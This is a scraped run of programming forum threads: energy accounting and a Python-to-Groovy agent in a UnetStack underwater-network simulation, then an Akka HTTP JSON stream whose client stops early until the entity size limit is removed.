float Etx = Ptx * dataPacketDuration //Energy in Joul
float Erx = Prx * dataPacketDuration
float Eidle = Pidle * dataPacketDuration
// float power = 0.00001995262315 //in watt (-17 in db=10log(p/1mw) .. so p = 10to the power -1.7 = 0.00001995262315
// BigDecimal Ptx = (Math.pow(10.0,(txPower/10) ))/1000 //????
// BigDecimal Etx= Ptx *((frameLength[1]*8)/640) // This is consumed energy (in transmission) Etx = Ptx*time it takes to tramsnit tha packet
//float Etx =10
#Override
boolean send(Message m) {
if (m instanceof TxFrameNtf)
{
energy -= Etx// Remaining energy
totalEtx += Etx //total energy consumed in tx
}
if (m instanceof RxFrameNtf)
{
energy -= Erx // Remaining energy
totalErx += Erx //total energy consumed in rx
}
if(!busy)
{
energy-= Eidle //Remaining energy
totalEidle += Eidle //total energy consumed while Eidle
}
totalEnergyConsumed = totalEtx+totalErx+totalEidle
return super.send(m)
}
}
Sorry for the very very long post...I think everything was necessary to understand the code
A few problems in your original code:
You don't need to create a service, since you can address the agent by its name. This should be sufficient for your example here.
To process a request (DatagramReq from your Python code), you should override the processRequest() method in the agent.
Here's a simplified example based on your original code:
PythonAgent.groovy:
import org.arl.fjage.*
import org.arl.unet.*
class PythonAgent extends UnetAgent {
void startup() {
println('pyAgent running')
}
#Override
Message processRequest(Message msg) {
if (msg instanceof DatagramReq) {
println('Got a DatagramNtf')
// do whatever you want with the request
return new Message(msg, Performative.AGREE)
}
return null
}
}
sim1.groovy:
import org.arl.fjage.RealTimePlatform
platform = RealTimePlatform // use real-time mode
simulate {
node '1', address: 1, web: 8101, api: 1101, stack: {
container -> container.add 'pyagent', new PythonAgent()
}
}
and test1.py:
from unetpy import *
from fjagepy import *
sock = UnetSocket('localhost', 1101) # node 1's API port as per sim script
gw = sock.getGateway()
pyagent = gw.agent('pyagent') # agent name as per sim script
rsp = pyagent << DatagramReq()
print(rsp)
Thank you, I did not knew I needed to #Override. I still have a question, how can I put data in my DatagramReq that I can extract in UnetStack ?
I tried this as a first solution looking at the Handbook but it doesn't works..
PythonAgent.groovy
import org.arl.fjage.*
import org.arl.unet.*
class PythonAgent extends UnetAgent {
void startup() {
println('pyAgent running')
}
#Override
Message processRequest(Message msg) {
if (msg instanceof DatagramReq) {
println('Got a DatagramNtf')
println(msg.data)
// do whatever you want with the request
return new Message(msg, Performative.AGREE)
}
return null
}
}
test1.py
from unetpy import *
from fjagepy import *
sock = UnetSocket('localhost', 1101) # node 1's API port as per sim script
gw = sock.getGateway()
pyagent = gw.agent('pyagent') # agent name as per sim script
rsp1 = pyagent << DatagramReq( data = [42])
rsp2 = pyagent << DatagramReq( data = 'data_string')
print(rsp1, rsp2)
On the Python terminal I will get Agree None. I can transmit an array but not a string ?
The log print
Incoming connection tcp:///127.0.0.1:1101//127.0.0.1.51208
1583166206032 INFO PythonAgent/1#2643:println Got a DatagramNtf
1583166206032 INFO PythonAgent/1#2643:println [B#4e3d88df
1583166206033 WARNING org.arl.fjage.remote.ConnectionHandler#2670:run Bad JSON request: java.lang.IllegalArgumentException: Illegal base64 character 5f in {"action": "send", "relay": true, "message": { "clazz": "org.arl.unet.DatagramReq", "data": {"msgID":"492ac9dd-c2bf-4c0c-9198-3b32fb416f33","perf":"REQUEST","recipient":"pyagent","sender":"PythonGW-c8e66e0f-b5d5-433b-bfa9-09be708ab4c9","inReplyTo":null,"data":"data_string"} }}
1583166207081 INFO org.arl.unet.sim.SimulationMasterContainer#2670:connectionClosed Connection tcp:///127.0.0.1:1101//127.0.0.1.51208 closed
[B#4e3d88df correspond to [42] but I don't know how to decode it. And in fact I am more interested in sending string than array. I have a track about using PDU but how could it works with Python ?
Im trying to write a simple akka stream rest endpoint and client for consuming this stream. But then i try to run server and client, client is able to consume only part of stream. I can't see any exception during execution.
Here are my server and client:
import akka.NotUsed
import akka.actor.ActorSystem
import akka.http.scaladsl.Http
import akka.http.scaladsl.common.{EntityStreamingSupport, JsonEntityStreamingSupport}
import akka.http.scaladsl.server.Directives._
import akka.http.scaladsl.marshallers.sprayjson.SprayJsonSupport
import akka.stream.{ActorAttributes, ActorMaterializer, Attributes, Supervision}
import akka.stream.scaladsl.{Flow, Source}
import akka.util.ByteString
import spray.json.DefaultJsonProtocol
import scala.io.StdIn
import scala.util.Random
object WebServer {
object Model {
case class Person(id: Int = Random.nextInt(), fName: String = Random.nextString(10), sName: String = Random.nextString(10))
}
object JsonProtocol extends SprayJsonSupport with DefaultJsonProtocol {
implicit val personFormat = jsonFormat(Model.Person.apply, "id", "firstName", "secondaryName")
}
def main(args: Array[String]) {
implicit val system = ActorSystem("my-system")
implicit val materializer = ActorMaterializer()
implicit val executionContext = system.dispatcher
val start = ByteString.empty
val sep = ByteString("\n")
val end = ByteString.empty
import JsonProtocol._
implicit val jsonStreamingSupport: JsonEntityStreamingSupport = EntityStreamingSupport.json()
.withFramingRenderer(Flow[ByteString].intersperse(start, sep, end))
.withParallelMarshalling(parallelism = 8, unordered = false)
val decider: Supervision.Decider = {
case ex: Throwable => {
println("Exception occurs")
ex.printStackTrace()
Supervision.Resume
}
}
val persons: Source[Model.Person, NotUsed] = Source.fromIterator(
() => (0 to 1000000).map(id => Model.Person(id = id)).iterator
)
.withAttributes(ActorAttributes.supervisionStrategy(decider))
.map(p => { println(p); p })
val route =
path("persons") {
get {
complete(persons)
}
}
val bindingFuture = Http().bindAndHandle(route, "localhost", 8080)
println(s"Server online at http://localhost:8080/\nPress RETURN to stop...")
StdIn.readLine()
bindingFuture
.flatMap(_.unbind())
.onComplete(_ => {
println("Stopping http server ...")
system.terminate()
})
}
}
and client:
import akka.actor.ActorSystem
import akka.http.scaladsl.Http
import akka.http.scaladsl.model.{HttpRequest, Uri}
import akka.stream.{ActorAttributes, ActorMaterializer, Supervision}
import scala.util.{Failure, Success}
object WebClient {
def main(args: Array[String]): Unit = {
implicit val system = ActorSystem()
implicit val materializer = ActorMaterializer()
implicit val executionContext = system.dispatcher
val request = HttpRequest(uri = Uri("http://localhost:8080/persons"))
val response = Http().singleRequest(request)
val attributes = ActorAttributes.withSupervisionStrategy {
case ex: Throwable => {
println("Exception occurs")
ex.printStackTrace
Supervision.Resume
}
}
response.map(r => {
r.entity.dataBytes.withAttributes(attributes)
}).onComplete {
case Success(db) => db.map(bs => bs.utf8String).runForeach(println)
case Failure(ex) => ex.printStackTrace()
}
}
}
it works for 100, 1000, 10 000 persons but does not work for > 100 000'.
It looks like there is some limit for stream but i can't find it
Last record has been printed by server on my local machine is (with number 79101):
Person(79101,ⰷ瑐劲죗醂竜泲늎制䠸,䮳硝沢并⎗ᝨᫌꊭᐽ酡)
Last record on client is(with number 79048):
{"id":79048,"firstName":"췁頔䚐龫暀࡙頨捜昗㢵","secondaryName":"⏉ݾ袈庩컆◁ꄹ葪䑥Ϻ"}
Maybe somebody know why it happens?
I found a solution. I have to explicitly add r.entity.withoutSizeLimit() on client and after that all works as expected